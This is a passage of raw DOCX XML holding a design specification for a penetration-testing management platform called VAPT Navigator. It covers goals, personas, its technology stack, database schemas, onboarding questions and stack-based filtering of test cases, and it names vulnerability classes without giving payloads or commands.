          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G3: Cut report generation time by 80% with auto-reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G4: Increase tester engagement through gamification (target: &gt;85% session completion rate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G5: Enable multi-project, multi-tester management in one platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G6: Provide actionable, stack-aware payload and tool guidance for every test case</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2.3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Description &amp; Needs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Junior VAPT Tester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Needs step-by-step guidance, payloads, and what to look for. Cannot be overwhelmed. Needs encouragement.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Senior Pen Tester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Needs speed, efficiency, keyboard shortcuts, bulk actions, and quick payload access.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Security Lead / Manager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Needs project oversight, tester assignment, progress tracking, SLA management, and executive reports.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Owner / SPOC</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Needs a high-level view of their application security posture and finding severity.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DevSecOps Engineer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Needs integration with CI/CD, JIRA/ticketing, and remediation tracking.</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2.4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 case coverage per engagement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98%</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Average time per test case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&lt; 5 minutes (with guidance)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Report generation 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&lt; 2 minutes (auto)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Platform uptime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99.9% SLA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Tester session completion rate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 85%</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Average findings documented per project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+40% vs Excel baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Technology Architecture</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3.1 Architecture Decision — Rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">After evaluating multiple stacks, the following architecture is selected based on: developer ecosystem maturity, performance, security, scalability, and speed of development for this specific use case.</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3.2 Chosen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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🏗️ SELECTED STACK: Next.js 14 + FastAPI + PostgreSQL</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Frontend — Next.js 14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Technology &amp; Reason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Framework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Next.js 14 with App Router — SSR/SSG for speed, SEO, and React Server Components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UI Library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shadcn/ui + Radix UI — Accessible, unstyled, fully customizable components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Styling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Tailwind CSS v3 — Utility-first, dark mode, rapid theming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Animations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Framer Motion — Production-grade animations, gestures, page transitions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Charts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Recharts + D3.js — Flexible data visualization for dashboards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Management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Zustand + React Query (TanStack Query) — Lightweight global state + server state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Form Handling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React Hook Form + Zod — Schema validation, performant forms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Icons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Lucide React + Heroicons — Clean, consistent icon set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React Hot Toast + Sonner — Beautiful toasts for achievements/alerts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Code Highlight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Shiki / Prism React Renderer — Syntax highlighting for payloads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3D/Particles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Three.js via React Three Fiber — Background effects, achievement explosions</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Backend — FastAPI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Technology &amp; Reason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Framework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 — Async, auto-OpenAPI docs, Pydantic validation, fastest Python framework</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Runtime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3.11+ with Uvicorn ASGI server + Gunicorn for production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SQLAlchemy 2.0 (async) + Alembic for migrations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FastAPI-Users + JWT (RS256) + HTTP-Only cookies — Secure session management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Hashing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Argon2id via passlib — OWASP recommended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Rate Limiting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SlowAPI (per-endpoint rate limiting) + Redis for distributed rate limits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 Queue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Celery + Redis — Async report generation, email notifications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Processing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python-docx, WeasyPrint — Report generation in DOCX and HTML/PDF</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Validation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Pydantic v2 — Fast, strict data validation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Configurable strict CORS policy — Domain whitelist only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WebSockets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 WebSocket — Real-time progress updates, collaborative testing</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Database — PostgreSQL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Technology &amp; Reason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DB</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 16 — ACID, JSON support, full-text search, row-level security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Caching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Redis 7 — Session cache, rate limiting, real-time pub/sub, Celery broker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 Full-Text Search + pg_trgm — Fast test case &amp; payload search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Migrations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Alembic — Version-controlled schema migrations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pg_dump + S3/MinIO automated daily backups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Connection Pool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PgBouncer — Connection pooling for high concurrency</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Technology &amp; Reason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Containerization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Docker + Docker Compose (dev) / Kubernetes (prod)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Reverse Proxy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Nginx — TLS termination, rate limiting, static file serving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CI/CD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GitHub Actions — Automated testing, linting, Docker build &amp; push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Secrets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HashiCorp Vault or AWS Secrets Manager — Zero plaintext secrets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Monitoring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Prometheus + Grafana — Metrics, alerting, dashboards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Logging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ELK Stack (Elasticsearch + Logstash + Kibana) or Loki + Grafana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 Tracking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Sentry — Real-time error monitoring for both frontend and backend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TLS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Let's Encrypt (Certbot) — Auto-renewing TLS certificates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3.3 System Architecture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0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ARCHITECTURE OVERVIEW</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                     VAPT NAVIGATOR PLATFORM                     │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├──────────────────────────┬──────────────────────────────────────┤</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│    FRONTEND (Next.js 14)  │        BACKEND (FastAPI)             │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  ┌─────────────────────┐ │  ┌──────────────────────────────┐   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  │ Next.js App Router  │ │  │  REST API + WebSocket Server │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  │ Framer Motion UI    │◄──►│  JWT Auth + RBAC             │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  │ Recharts + D3       │ │  │  Pydantic Validation         │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  │ Zustand Store       │ │  │  Celery Task Queue           │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│  └─────────────────────┘ │  └──────────────┬───────────────┘   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                           │                 │                   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                           │  ┌──────────────▼───────────────┐   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                           │  │  PostgreSQL 16  │  Redis 7   │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                           │  │  Row-Level Sec  │  Cache     │   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│                           │  └──────────────────────────────┘   │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">└──────────────────────────┴──────────────────────────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        │                                                           </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   ┌────▼────┐  ┌──────────┐  ┌──────────┐  ┌──────────────────┐</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   │  Nginx  │  │  Celery  │  │  Sentry  │  │ Prometheus+Grafana│</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   └─────────┘  └──────────┘  └──────────┘  └──────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Database Design</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The database is designed with security, multi-tenancy, and extensibility as core principles. Row-Level Security (RLS) in PostgreSQL ensures data isolation between organizations.</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4.1 Core Entity Relationship</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Schema: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Type + Constraints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PRIMARY KEY DEFAULT gen_random_uuid()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email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 UNIQUE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VARCHAR(100) UNIQUE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hashed_password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NOT NULL (Argon2id)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full_name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ENUM(admin, lead, tester, viewer)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organization_id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organizations.id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avatar_url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xp_points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DEFAULT 0 — Gamification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level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DEFAULT 1</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badges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DEFAULT [] — Achievement badges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is_active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 DEFAULT TRUE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last_login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mfa_secret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(TOTP secret, encrypted at rest)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mfa_enabled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 DEFAULT FALSE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 DEFAULT NOW()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Schema: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Type + Constraints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PRIMARY KEY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application_name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application_version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VARCHAR(50)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app_owner_name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app_spoc_name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app_spoc_email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tester_id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users.id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lead_id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users.id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organization_id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organizations.id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ENUM(draft, in_progress, review, completed, archived)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started_at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stack_profile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{frontend, backend, db, auth_type, api_type, ...}</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applicable_categories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Filtered category IDs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total_test_cases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tested_count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DEFAULT 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passed_count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DEFAULT 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failed_count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DEFAULT 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na_count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DEFAULT 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cvss_score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DECIMAL(4,2)</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risk_rating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ENUM(critical, high, medium, low, info)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 DEFAULT NOW()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Schema: test_cases (Master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Type + Constraints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PRIMARY KEY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categories.id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title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description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owasp_ref</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VARCHAR(50) — e.g. A01:2021</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cwe_id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VARCHAR(20) — e.g. CWE-79</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cvss_base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DECIMAL(4,2)</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severity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ENUM(critical, high, medium, low, info)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ENUM(recon, pre_auth, auth, post_auth, business, api, client, transport, infra, tools)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applicability_conditions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Rules for when this applies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where_to_test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Exact location instructions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what_to_test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What the tester should look for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how_to_test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Step-by-step instructions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payloads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Array of payload objects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tool_commands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Array of {tool, command, description}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pass_indicators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What a PASS looks like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fail_indicators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What a FAIL / vulnerability looks like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remediation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Fix guidance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Links to PayloadsAllTheThings, OWASP, CVEs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tags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e.g. {jwt, sql, xss, api}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is_active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 DEFAULT TRUE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created_by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users.id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Schema: project_test_results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Type + Constraints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PRIMARY KEY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projects.id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test_case_id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test_cases.id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tester_id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users.id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ENUM(not_started, in_progress, passed, failed, na, blocked)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is_applicable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 DEFAULT TRUE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severity_override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ENUM(critical, high, medium, low, info) NULLABLE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notes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evidence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 — [{filename, url, description}]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request_captured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HTTP request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response_captured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HTTP response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reproduction_steps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tool_used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payload_used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time_spent_seconds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started_at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Schema: categories (Extensible Module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Type + Constraints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PRIMARY KEY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VARCHAR(255)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slug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VARCHAR(100) UNIQUE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 — Testing phase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icon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Emoji or icon name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description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order_index</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INTEGER — Display order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parent_id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NULLABLE — For subcategories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is_active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 DEFAULT TRUE</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Schema: findings (Vulnerability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Type + Constraints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PRIMARY KEY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projects.id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test_result_id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project_test_results.id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title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NOT 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description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severity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ENUM(critical, high, medium, low, info)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cvss_score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DECIMAL(4,2)</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cvss_vector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ENUM(open, confirmed, mitigated, fixed, accepted_risk, fp)</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owasp_category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VARCHAR(50)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cwe_id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VARCHAR(20)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affected_url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affected_parameter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request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evidence_urls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reproduction_steps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impact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recommendation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JSONB</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assigned_to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UUID FK → users.id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due_date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created_at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TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Application Onboarding &amp; Project Setup Flow</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The onboarding flow is designed to intelligently gather application context BEFORE showing any test cases. This enables the system to filter, prioritize, and contextualize the testing journey. The UI uses a multi-step wizard with smooth Framer Motion animations.</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5.1 Onboarding Step 1 — Application Stack Profiling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1E293B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PURPOSE: Collect technical stack details to eliminate non-applicable test cases and generate relevant payloads. This is the INTELLIGENCE ENGINE of the platform.</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Step 1A — Frontend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Options (Multi-Select Allowed)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Framework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React / Angular / Vue / Svelte / jQuery / Vanilla JS / Next.js / Nuxt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CSS Framework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Tailwind / Bootstrap / Material UI / Ant Design / Custom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 Page App?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(SPA) / No (Traditional) / Hybrid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JavaScript Bundler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Webpack / Vite / Parcel / Rollup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TypeScript Used?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Step 1B — Backend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Language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 Java / Node.js / PHP / Ruby / Go / .NET / Rust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Framework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Django / Flask / FastAPI / Spring Boot / Express / Laravel / Rails / ASP.NET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Template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Jinja2 / Thymeleaf / EJS / Blade / ERB / Twig / Handlebars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CMS?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WordPress / Drupal / Joomla / None / Custom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 Type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Apache / Nginx / IIS / Tomcat / Node HTTP / Unknown</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Step 1C — Database &amp;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Database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 / MySQL / MSSQL / Oracle / MongoDB / DynamoDB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ORM Used?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SQLAlchemy / Hibernate / Sequelize / Eloquent / Active Record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NoSQL DB?</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MongoDB / Redis / Cassandra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Cache Layer?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Redis / Memcached / None / Unknown</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Step 1D — API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Options (Multi-Select)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Type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REST / GraphQL / SOAP / gRPC / WebSocket / XML-RPC / Not Sure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Format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 / XML / Form Data / Multipart / Plain Text / Mixed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Methods Used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GET / POST / PUT / PATCH / DELETE / OPTIONS / HEAD / Not Sure (select all)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Authentication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JWT / OAuth2 / API Key / Basic Auth / Session Cookie / HMAC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Documentation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Swagger/OpenAPI / Postman Collection / WSDL / None</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Step 1E — Authentication &amp;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 Mechanism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Username+Password / SSO / OAuth / SAML / MFA / OTP / Certificate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Storage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Cookie (HttpOnly) / JWT (localStorage) / JWT (cookie) / Session Variable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Token Type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JWT / SAML / Opaque Token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MFA Implemented?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TOTP / SMS OTP / Email OTP / Push Notification / None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Reset?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Email Link / SMS OTP / Security Questions / Admin Reset / Unknown</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Step 1F — Application Features (Determines Business Logic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Include? (Yes/No/Unknown)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Registration / Signup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Shopping Cart / E-commerce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Payment Gateway Integration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Upload Functionality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Rich Text Editor / WYSIWYG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Panel / Dashboard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Role Management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Third-party Integrations / Webhooks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Email / SMS Notifications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Export to PDF / Excel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Two-Factor Authentication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GraphQL Endpoint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WebSocket / Real-time Features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CAPTCHA Implementation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Management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OTP / OTAC System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 / No / Unknown</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5.2 Onboarding Step 2 — Project &amp; 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Input Type &amp; Validation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 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Required, max 100 chars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Required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Version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e.g. 2.3.1, Optional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Base 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URL — Required, validated format, https check</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Owner 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Required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SPOC Name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Required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SPOC Email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Email — Required, validated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SPOC Phone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 Optional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Lead Tester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 Search Dropdown — Filtered by role=lead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Assigned Testers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Multi-select User Search — Multiple testers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Testing Type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Black Box / Grey Box / White Box</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Testing Scope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area — URLs in scope, exclusions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Testing Start Date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 Picker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Target Completion Date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 Picker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Environment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Production / Staging / Development / UAT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Internal / Confidential / Public</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Additional Context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 area — Any special notes for testers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5.3 Onboarding Step 3 — Intelligent Test Case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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF"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INTELLIGENCE ENGINE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Based on the stack profile collected in Step 1, the system automatically:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">• Eliminates tests for technologies NOT in use (e.g., no .NET ViewState tests for a Python app)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">• Promotes tests relevant to detected stack (e.g., SSTI for Jinja2, AngularJS for Angular)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">• Pre-marks non-applicable tests as NA with an explanation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">• Shows applicability score: "847 of 1,200 test cases apply to your stack"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">• Allows tester to override any auto-decision</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Filtering Logic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Test Cases Eliminated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.NET in stack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ViewState, ASPX-specific, .NET deserialization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XML/SOAP in stack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XXE via SOAP, WSDL enumeration, SOAP header injection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GraphQL detected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GraphQL introspection, GraphQL injection, field suggestions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file upload feature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Malicious file upload, file extension bypass tests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payment gateway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Payment gateway tampering, negative amount, receipt replay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OTP/MFA</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OTP bypass, OTP brute force, OTP replay tests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cart/e-commerce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Cart manipulation, negative quantity, price tampering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in localStorage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Highlight XSS→token theft risk, storage-specific tests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PHP backend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Include PHP-specific: LFI/RFI, phpinfo, PHP session issues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Angular frontend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Include AngularJS template injection, CSP bypass tests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CAPTCHA detected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CAPTCHA bypass tests marked NA, brute force flagged higher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Testing Journey — Gamification Framework</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The core psychological design principle: Never overwhelm the tester. Show progress, celebrate wins, provide context, and make security testing feel like an adventure — not a chore.</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6.1 The Journey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EBF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
